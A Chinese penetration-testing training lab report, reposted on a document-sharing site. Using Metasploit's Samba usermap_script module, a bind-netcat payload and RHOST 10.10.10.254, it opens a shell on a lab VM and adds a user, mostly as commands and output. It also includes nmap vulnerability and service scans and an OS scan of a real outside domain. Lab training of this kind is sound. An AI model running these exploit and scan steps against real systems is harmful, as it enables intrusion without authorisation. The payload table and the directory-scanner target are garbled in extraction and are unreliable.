收藏小站
渗透测试 实验报告 (中国移动安全部) 下载本文

内容发布更新时间 : 2024/5/6 22:07:52星期一 下面是文章的全部内容请认真阅读。

渗透测试培训 3月13日

第一天:主要实验总结

首先利用struts2

漏洞,可以直接执行任意命令,取得主机控制权。

实验环境:

KALI linux 作为攻击工具; owasp 作为靶机

2003 metaspoitable 实现能够成功访问

使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限 search samba 查找模块

Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷

Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数

Set RHOST 10.10.10.254 设置主机攻击主机 Exploit启动攻击

1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址范围为10.10.10.0/24 2、开启kali虚机,进入root模式,

首先进入msfconsle,修改初始密码为123456 msf〉> passwd [*] exec: passwd

输入新的 UNIX 密码: 重新输入新的 UNIX 密码: passwd:已成功更新密码

然后寻找samba模块 msf > search samba

Matching Modules ================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal

auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow

auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow

auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow

exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)

exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)

exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow

exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow

exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \

exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)

exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)

exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution

exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow

exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow

post/linux/gather/enum_configs normal Linux Gather Configurations

msf > use multi/samba/usermap_script 选择渗透攻击模块

msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷 Compatible Payloads ===================

Name Disclosure Date Rank Description ---- --------------- ---- -----------

cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)

cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)

cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)

cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)

cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)

cmd/unix/bind_netcat_gaping_ipv6 Bind TCP (via netcat -e) IPv6

cmd/unix/bind_perl Bind TCP (via Perl)

cmd/unix/bind_perl_ipv6 Bind TCP (via perl) IPv6

cmd/unix/bind_ruby Shell, Bind TCP (via Ruby)

cmd/unix/bind_ruby_ipv6 Bind TCP (via Ruby) IPv6

cmd/unix/bind_zsh Shell, Bind TCP (via Zsh)

cmd/unix/generic Generic Command Execution

cmd/unix/reverse Double Reverse TCP (telnet)

cmd/unix/reverse_awk Shell, Reverse TCP (via AWK)

cmd/unix/reverse_lua Reverse TCP (via Lua)

cmd/unix/reverse_netcat Reverse TCP (via netcat)

cmd/unix/reverse_netcat_gaping Reverse TCP (via netcat -e)

cmd/unix/reverse_openssl Double Reverse TCP SSL (openssl)

cmd/unix/reverse_perl Reverse TCP (via Perl)

cmd/unix/reverse_perl_ssl Reverse TCP SSL (via perl)

cmd/unix/reverse_php_ssl Reverse TCP SSL (via php)

cmd/unix/reverse_python Reverse TCP (via Python)

normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command normal Unix Command, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)

cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)

cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell

payload => cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 查看需要设置的参数

msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机 RHOST => 10.10.10.254

msf exploit(usermap_script) > exploit启动攻击

[*] Started bind handler

[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800

已经取得10.10.10.254机子的控制权,可以增加用户 useradd test 用户增加成功

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测 -PU -sn UDP ping不列服务,-Pn不适用ping

nmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmp namp -sV -Pn xx.xx.xx.xx 列出服务详细信息

namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

nmap 网站扫描

msf > nmap

msf > nmap -sV -Pn 10.10.10.254 [*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST Nmap scan report for 10.10.10.254 Host is up (0.00020s latency).

All 1000 scanned ports on 10.10.10.254 are filtered

MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).

All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)

map done: 1 IP address (1 host up) scanned in 23.06 seconds

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

msf > nmap -O www.ctsi.com.cn [*] exec: nmap -O www.ctsi.com.cn

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST Nmap scan report for www.ctsi.com.cn (211.100.35.132) Host is up (0.0054s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)

No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(dir_scanner) > set THREADS 50 THREADS => 50

msf auxiliary(dir_scanner) > set RHOSTS www.http://www.35331.cn/

Word文档下载:渗透测试 实验报告 (中国移动安全部).doc
搜索更多:渗透测试 实验报告 (中国移动安全部)


最新浏览


热门浏览
All rights reserved Powered by 南京廖华答案网 
资料来自互联网, 有任何疑问,请联系客服:779662525☒qq.com 苏ICP备20003344号-4